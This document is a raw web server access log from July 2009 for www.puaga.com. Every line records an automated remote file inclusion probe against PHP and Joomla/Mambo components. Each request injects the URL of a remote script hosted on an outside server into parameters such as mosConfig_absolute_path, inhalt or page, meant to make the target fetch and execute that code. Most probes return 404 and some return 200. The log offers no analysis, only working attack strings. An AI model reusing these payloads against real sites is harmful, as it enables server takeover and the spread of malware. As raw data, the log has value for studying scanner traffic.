88.191.37.60 - - [05/Jul/2009:05:00:00 -0700] "GET /logs/access_090523.log%20%20/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:00:02 -0700] "GET /logs/access_090611.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:00:03 -0700] "GET /logs/access_090521.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:00:14 -0700] "GET /logs/access_090526.log%20%20/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:00:14 -0700] "GET /logs/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:00:14 -0700] "GET /index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:00:18 -0700] "GET /logs/access_090523.log%20%20/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.237.155.83 - - [05/Jul/2009:05:02:19 -0700] "GET /logs/access_090604.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
80.237.155.83 - - [05/Jul/2009:05:02:19 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
80.237.155.83 - - [05/Jul/2009:05:02:19 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:05:02:31 -0700] "GET /logs/access_090616.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:02:36 -0700] "GET /logs/access_090531.log/!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:02:36 -0700] "GET /logs/!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:02:36 -0700] "GET /logs/access_090622.log/!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:02:36 -0700] "GET /!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:04:17 -0700] "GET /logs/access_090626.log//skin/zero_vote/admin.php?dir=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:04:22 -0700] "GET /logs/access_090628.log//skin/zero_vote/admin.php?dir=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.237.155.83 - - [05/Jul/2009:05:04:43 -0700] "GET /logs/access_090620.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
80.237.155.83 - - [05/Jul/2009:05:04:43 -0700] "GET /logs/access_090518.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:05:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:05:05 -0700] "GET /logs/access_090519.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:05:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:27 -0700] "GET /logs/access_090609.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:33 -0700] "GET /logs/access_090518.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:33 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:33 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:33 -0700] "GET /logs/access_090605.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:34 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:07:34 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:07:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:07:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:07:37 -0700] "GET /logs/access_090526.log/components/com_performs/performs.php?mosConfig_absolute_path=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:07:39 -0700] "GET /logs/access_090602.log/components/com_performs/performs.php?mosConfig_absolute_path=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:04 -0700] "GET /index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:05 -0700] "GET /logs/access_090611.log%20%20/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:06 -0700] "GET /logs/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:10 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:10 -0700] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:10 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:14 -0700] "GET /logs/access_090611.log/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:14 -0700] "GET /logs/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:14 -0700] "GET /index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:26 -0700] "GET /logs/access_090605.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:29 -0700] "GET /logs/access_090611.log/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:29 -0700] "GET /logs/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:30 -0700] "GET /logs/access_090523.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:08:30 -0700] "GET /index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:35 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:35 -0700] "GET /logs/access_090620.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:08:38 -0700] "GET /logs/access_090517.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:09:03 -0700] "GET /logs/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:09:03 -0700] "GET /index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:09:04 -0700] "GET /logs/access_090611.log/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:09:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:09:19 -0700] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:09:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:09:19 -0700] "GET /logs/access_090626.log//index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:09:19 -0700] "GET /index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:09:19 -0700] "GET /logs//index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:09:20 -0700] "GET /logs/access_090511.log%20%20/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:09:34 -0700] "GET /logs/access_090519.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:09:41 -0700] "GET /logs/access_090517.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:09:54 -0700] "GET /logs/access_090511.log/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:10:22 -0700] "GET /logs/access_090604.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:10:37 -0700] "GET /logs/access_090626.log//index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:10:37 -0700] "GET /index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:10:37 -0700] "GET /logs//index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.81.6 - - [05/Jul/2009:05:10:43 -0700] "GET /logs/access_090615.log/akocomments.php?mosConfig_absolute_path=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.81.6 - - [05/Jul/2009:05:10:43 -0700] "GET /logs/access_090619.log/akocomments.php?mosConfig_absolute_path=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:10:43 -0700] "GET /logs/access_090511.log/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.156.161 - - [05/Jul/2009:05:10:54 -0700] "GET /logs/access_090525.log%20%20/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:11:27 -0700] "GET /logs/access_090511.log//index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:11:28 -0700] "GET /logs/access_090525.log/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:11:28 -0700] "GET /include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:11:28 -0700] "GET /logs/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:11:47 -0700] "GET /logs/access_090517.log/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:11:48 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:11:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:11:51 -0700] "GET /logs/access_090530.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.156.161 - - [05/Jul/2009:05:12:09 -0700] "GET /logs/access_090525.log%20%20/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.156.161 - - [05/Jul/2009:05:12:38 -0700] "GET /logs/access_090617.log%20%20/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:05:12:39 -0700] "GET /logs/access_090511.log//index2.php?page=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:12:52 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:12:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:12:52 -0700] "GET /logs/access_090530.log%20%20/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:13:15 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:13:19 -0700] "GET /logs/access_090530.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:13:19 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:13:33 -0700] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:13:40 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:13:40 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.34 - - [05/Jul/2009:05:13:41 -0700] "GET /logs/access_090604.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:43 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:43 -0700] "GET /logs/access_090617.log/components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:43 -0700] "GET /logs/access_090517.log/components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:43 -0700] "GET /logs/components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
211.230.156.161 - - [05/Jul/2009:05:13:46 -0700] "GET /logs/access_090617.log%20%20/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:13:47 -0700] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:13:48 -0700] "GET /logs/access_090530.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:54 -0700] "GET /logs/access_090516.log/modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:54 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:13:54 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:14:17 -0700] "GET /logs/access_090608.log/modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:14:39 -0700] "GET /logs/access_090610.log//skin/zero_vote/admin.php?dir=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:25 -0700] "GET /logs/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:25 -0700] "GET /logs/access_090511.log/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:25 -0700] "GET /errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:40 -0700] "GET /logs/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:40 -0700] "GET /errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:40 -0700] "GET /logs/access_090511.log/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:42 -0700] "GET /logs/access.log/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:05:15:54 -0700] "GET /logs/access.log/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:15:56 -0700] "GET /logs/access_090612.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.245.23.158 - - [05/Jul/2009:05:16:24 -0700] "GET /logs/access_090612.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:16:55 -0700] "GET /logs/access_090527.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:17:29 -0700] "GET /logs/access_090519.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:17:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
